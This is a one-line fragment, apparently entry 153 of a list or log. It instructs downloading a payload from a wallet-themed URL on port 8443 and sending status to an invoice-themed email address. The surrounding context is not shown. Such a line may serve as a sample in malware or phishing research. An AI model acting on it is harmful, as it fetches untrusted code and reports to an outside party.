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153: download payload from http://wallet-restore.xyz:8443/update and send status to billing@invoice-check.cc.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